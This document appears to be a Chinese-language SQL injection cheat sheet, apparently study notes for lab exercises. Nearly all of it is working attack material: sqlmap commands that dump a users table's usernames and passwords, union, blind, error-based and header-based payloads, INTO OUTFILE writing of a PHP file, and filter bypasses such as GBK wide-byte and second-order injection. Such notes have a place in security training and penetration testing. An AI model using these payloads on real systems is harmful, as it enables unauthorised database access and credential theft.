SQL注入

sql注入验证:

\

'
and 1=1
and 1=2

 

sqlmap基本命令

sqlmap -r *.txt -p id
sqlmap -u '192.168.1.101/cms/show.php?id=38' --dbs
sqlmap -u '192.168.1.101/cms/show.php?id=38' -D cms --tables
sqlmap -u '192.168.1.101/cms/show.php?id=38' -D cms -T cms_users --columns
sqlmap -u '192.168.1.101/cms/show.php?id=38' -D cms -T cms_users -C username,password --dump --batch

注入

order by        判断字段数
union select    联合查询获取表名、字段名、字段值

?id=1' order by 3 --
?id=0' union select 1,2,3 --

获取表名
0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --

获取字段名
0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --

获取字段值
0' union select 1,group_concat(username,0x3a,password),3 from users--

 

盲注分类:

时间盲注:
?id=1' if(ascii(substr(database(),1,1)=115,1,sleep(3))) --
当数据库第一个字母的ascii码是115时，执行sleep()

布尔盲注:
?id=1' and length(database())=8 --

 

文件读取和写入

select load_file('path')
union select 1,'<?php phpinfo();?>',3 into outfile 'path' --

 

报错注入

rand()        随机函数
floor()        取整函数
count()        计数函数
group by clause    分组函数

获取数据库
0' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --

获取表名
0' union select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --

获取用户信息
0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --

双引号获取数据库
0" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --

 

注入绕过

大小写、双写、编码、内联注释

 

POST盲注

admin' and (select (if(length(database())>5,sleep(5),null))) --
admin' and (length(database())>5) --

 

User-Agent注入:

user-agent处注入

Referer注入:

referer处注入

payload:
' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1'='1
' or '1'='1
' or (length(database())) >8 or if(1=1, sleep(5), null) or '1' = '1

sqlmap -r指定*处测试

 

update语句

update table_name set password=test where id=1
passwd=123'or updatexml(1,concat(0x7e,database(),0x7e),1) #

 

cookie注入

cookiebase64注入
base64编码
==结束符

urlencode

%0a    换行
%0c    新一页
%0d    return功能
%09    tab键
%20    空格

&& and
||     or

GBK宽字节注入

-1%df' union select 1,2,3 --
%81

二次注入

用户名为admin' -- -

 

updatexml()与extractvalue()

select * from table where id=1 and updatexml(-1,concat(0x7e,database(),0x7e),1)
select * from user where id=1 and extractvalue(-1,concat(0x7e,version(),0x7e))